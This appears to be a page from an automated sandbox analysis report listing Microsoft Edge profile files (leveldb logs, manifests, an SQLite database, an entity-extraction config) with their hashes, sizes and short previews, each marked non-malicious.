                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):103
                                                                                                                                                                                                                                                                  Entropy (8bit):5.287315490441997
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVj2Thin/GpR8xFxN3erkEtl:scoBY7j2Q/+KxFDkHl
                                                                                                                                                                                                                                                                  MD5:B987581B38C2439D148DE0B235DA8457
                                                                                                                                                                                                                                                                  SHA1:72F284B50FC9F8F7055DD32F746D311D9DB3D5D5
                                                                                                                                                                                                                                                                  SHA-256:8E8CCF597EB794A3832FA9094F758D2AFC34CF9333B5776A1507CC2D5694AF52
                                                                                                                                                                                                                                                                  SHA-512:7E741B1E97D08918274192AAF0DDF94809D2ABE94E511F47FB863D8E806D62A8FABD07A98F64E9B925A474D79FC06F887E0171C6A3AD61693475A849E3F914E4
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator.......u..7...............&.BLOOM_FILTER:.........DB_VERSION........

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                  Entropy (8bit):0.6126331521603546
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:TLs9pRSJDBJuqJSEDNvrWjJQ9Dl9np59yDLgHFUxOUDaaTXubHa7mW9L9U1MAlWB:TLapR+DDNzWjJ0npnyXKUO8+j8MpxjmL
                                                                                                                                                                                                                                                                  MD5:8D3DAC235F702A5B6FFB84A86D4686B9
                                                                                                                                                                                                                                                                  SHA1:6BDC70FF52F479589D576CBDD7A11AFE9CA35C28
                                                                                                                                                                                                                                                                  SHA-256:15A81B7E6E3E8AE5AFA3DC894BBB5A9491C419DFDCA44E57CDEA8CFC66AF6060
                                                                                                                                                                                                                                                                  SHA-512:9ADF8260F7DDF37F738C40418E8B7A8AA00B58F2541B9D5C2B139CDC07C5C16466CDCF924CB36987DE946EF752D1C185584A1A3138A7F6EF2BE07349379C980B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                                                                  Entropy (8bit):5.354125965513357
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:cA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:cFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                  MD5:C4E951008A32188DF21CAE41487535C4
                                                                                                                                                                                                                                                                  SHA1:3AD372B05E8D9202C9BFE1041AF5700E9E0AA791
                                                                                                                                                                                                                                                                  SHA-256:A9A06C80FFB07D468729A21BB3FD3E4354F1F2691ED0B0803B9BBB43D926B194
                                                                                                                                                                                                                                                                  SHA-512:BEB50FF89A6660B264AA3134AB84E57ED3F0F571772F11D1A3889EA773AC14B3E5F7D69B3A00A842DE2470143C2EFC0F297BE48075D86CB68E01DF91CFF7A34F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1,..@q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13379085872307099..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):315
                                                                                                                                                                                                                                                                  Entropy (8bit):5.123543286452373
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPoY1N723oH+Tcwtk2WwnvB2KLlpoPHWwFIq2PN723oH+Tcwtk2WwnvIFUv:7EaYebkxwnvFLTegvVaYebkxwnQFUv
                                                                                                                                                                                                                                                                  MD5:D30F7DC3393A1B3D2F2B125DD5341238
                                                                                                                                                                                                                                                                  SHA1:DD5340FD5F8AFC0C6614D568CE83B2F232AED2B1
                                                                                                                                                                                                                                                                  SHA-256:C277352B9CCDE8C4A6854090DFFC25B73196047056A93BADF0278452FEE982C8
                                                                                                                                                                                                                                                                  SHA-512:BDE87D0C993B907C33C51C9DB216EC3CF2DAE3AFE150123E5255B58EF347455112B5C3A5A53898FF40DA956AE4CA62A9DD8B0F0CE1FAE9B3921DBBEB04C9F2F0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:29.023 23e0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/19-07:44:29.050 23e0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                                                                  Entropy (8bit):5.324612858630404
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RW:C1gAg1zfve
                                                                                                                                                                                                                                                                  MD5:6FE7EC587D4DE970C9D4766F21F16A93
                                                                                                                                                                                                                                                                  SHA1:90E807DB9B3C736A50A04B8EDDB23E4A4410BE81
                                                                                                                                                                                                                                                                  SHA-256:ED1BE0A067B1AD1F29A2C249C00DFA347C21C19CF5AF1C1D5E5C1C93CB5E17E2
                                                                                                                                                                                                                                                                  SHA-512:85CB9D49B3A7647537422F1A8EF45A96C512FC0F8A90E281F96449418F9FFA7F315492BC2E5C0E5BA4587B166E797FD27CCF5F383122F00A6C18DF2D741B514E
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):5.189416528564104
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPkOq2PN723oH+Tcwt8aPrqIFUt8OoPdhZmw+OoPBq7kwON723oH+Tcwt8amLJ:73OvVaYebL3FUt8OY/+Oey5OaYebQJ
                                                                                                                                                                                                                                                                  MD5:38A57254D7650A616620E9CD45C49988
                                                                                                                                                                                                                                                                  SHA1:E322E0F5F475EABC537C49688594659C32033202
                                                                                                                                                                                                                                                                  SHA-256:5F7B81A055D28E3EC92F0CAC905DFEA7F9EA6B2B926617B6B3DF2EA60E53EBBB
                                                                                                                                                                                                                                                                  SHA-512:2C1EA9FC8D71C7C0B6CC387DC7937C23F871D42EE65A434E59D1EA435B8D576FDF8B21679FB4CA1CB0A3952A45D7FEDFD1F8A7751BD31BD8F326D7F896E30BF0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.520 1db0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/19-07:44:23.594 1db0 Recovering log #3.2024/12/19-07:44:23.595 1db0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):5.189416528564104
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPkOq2PN723oH+Tcwt8aPrqIFUt8OoPdhZmw+OoPBq7kwON723oH+Tcwt8amLJ:73OvVaYebL3FUt8OY/+Oey5OaYebQJ
                                                                                                                                                                                                                                                                  MD5:38A57254D7650A616620E9CD45C49988
                                                                                                                                                                                                                                                                  SHA1:E322E0F5F475EABC537C49688594659C32033202
                                                                                                                                                                                                                                                                  SHA-256:5F7B81A055D28E3EC92F0CAC905DFEA7F9EA6B2B926617B6B3DF2EA60E53EBBB
                                                                                                                                                                                                                                                                  SHA-512:2C1EA9FC8D71C7C0B6CC387DC7937C23F871D42EE65A434E59D1EA435B8D576FDF8B21679FB4CA1CB0A3952A45D7FEDFD1F8A7751BD31BD8F326D7F896E30BF0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.520 1db0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/19-07:44:23.594 1db0 Recovering log #3.2024/12/19-07:44:23.595 1db0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):418
                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                  MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                  SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                  SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                  SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):332
                                                                                                                                                                                                                                                                  Entropy (8bit):5.208452459088287
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPm+aq2PN723oH+Tcwt865IFUt8OoPKhZmw+OoPK7kwON723oH+Tcwt86+ULJ:7lJvVaYeb/WFUt8Ojh/+Oj75OaYeb/+e
                                                                                                                                                                                                                                                                  MD5:45CE61175B326CD5665DB899D9F0201A
                                                                                                                                                                                                                                                                  SHA1:CA76A455EB6CDF2C73AFBF8F5E06F80ECBE8110E
                                                                                                                                                                                                                                                                  SHA-256:F9E4BAA16829C8AF2550FCE61727C8E94D88F9CDD939B633C6AA13BEB355C46D
                                                                                                                                                                                                                                                                  SHA-512:A80B54B3CE5C62E13912FDB360BB7365E3B129603B552B4E501EF772FC6FC5071B41C8EFD1F9FA183BBBBD2C06D9B9029FB01E3E2FDFBFDCC36000787DC3A137
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.602 1db0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/19-07:44:23.618 1db0 Recovering log #3.2024/12/19-07:44:23.618 1db0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):332
                                                                                                                                                                                                                                                                  Entropy (8bit):5.208452459088287
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPm+aq2PN723oH+Tcwt865IFUt8OoPKhZmw+OoPK7kwON723oH+Tcwt86+ULJ:7lJvVaYeb/WFUt8Ojh/+Oj75OaYeb/+e
                                                                                                                                                                                                                                                                  MD5:45CE61175B326CD5665DB899D9F0201A
                                                                                                                                                                                                                                                                  SHA1:CA76A455EB6CDF2C73AFBF8F5E06F80ECBE8110E
                                                                                                                                                                                                                                                                  SHA-256:F9E4BAA16829C8AF2550FCE61727C8E94D88F9CDD939B633C6AA13BEB355C46D
                                                                                                                                                                                                                                                                  SHA-512:A80B54B3CE5C62E13912FDB360BB7365E3B129603B552B4E501EF772FC6FC5071B41C8EFD1F9FA183BBBBD2C06D9B9029FB01E3E2FDFBFDCC36000787DC3A137
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:23.602 1db0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/19-07:44:23.618 1db0 Recovering log #3.2024/12/19-07:44:23.618 1db0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1254
                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                  MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                  SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                  SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                  SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):5.151898657548331
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPmjQ+q2PN723oH+Tcwt8NIFUt8OoPngZmw+OoPAjQVkwON723oH+Tcwt8+eLJ:7dBvVaYebpFUt8OT/+Os5OaYebqJ
                                                                                                                                                                                                                                                                  MD5:89CB5FEBE8A24AF8640F53B19C0EA6A2
                                                                                                                                                                                                                                                                  SHA1:CF59A0F18F67000121503124AE3B74FF7E037666
                                                                                                                                                                                                                                                                  SHA-256:60E416E134294331DDC8E8DA986875246BDFB98638CD344FCB1F576E961C96C7
                                                                                                                                                                                                                                                                  SHA-512:CAB32C17F0EAEFBC1C12223219707AED90C601CDADFBA272ECBD26B7BD5E58C4BD95088AE42885799C86D37D732976127248A6C7F732EC5CA7B5ED7C14C34E1B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.445 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/19-07:44:24.446 1d08 Recovering log #3.2024/12/19-07:44:24.447 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                  Entropy (8bit):5.151898657548331
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPmjQ+q2PN723oH+Tcwt8NIFUt8OoPngZmw+OoPAjQVkwON723oH+Tcwt8+eLJ:7dBvVaYebpFUt8OT/+Os5OaYebqJ
                                                                                                                                                                                                                                                                  MD5:89CB5FEBE8A24AF8640F53B19C0EA6A2
                                                                                                                                                                                                                                                                  SHA1:CF59A0F18F67000121503124AE3B74FF7E037666
                                                                                                                                                                                                                                                                  SHA-256:60E416E134294331DDC8E8DA986875246BDFB98638CD344FCB1F576E961C96C7
                                                                                                                                                                                                                                                                  SHA-512:CAB32C17F0EAEFBC1C12223219707AED90C601CDADFBA272ECBD26B7BD5E58C4BD95088AE42885799C86D37D732976127248A6C7F732EC5CA7B5ED7C14C34E1B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.445 1d08 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/19-07:44:24.446 1d08 Recovering log #3.2024/12/19-07:44:24.447 1d08 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

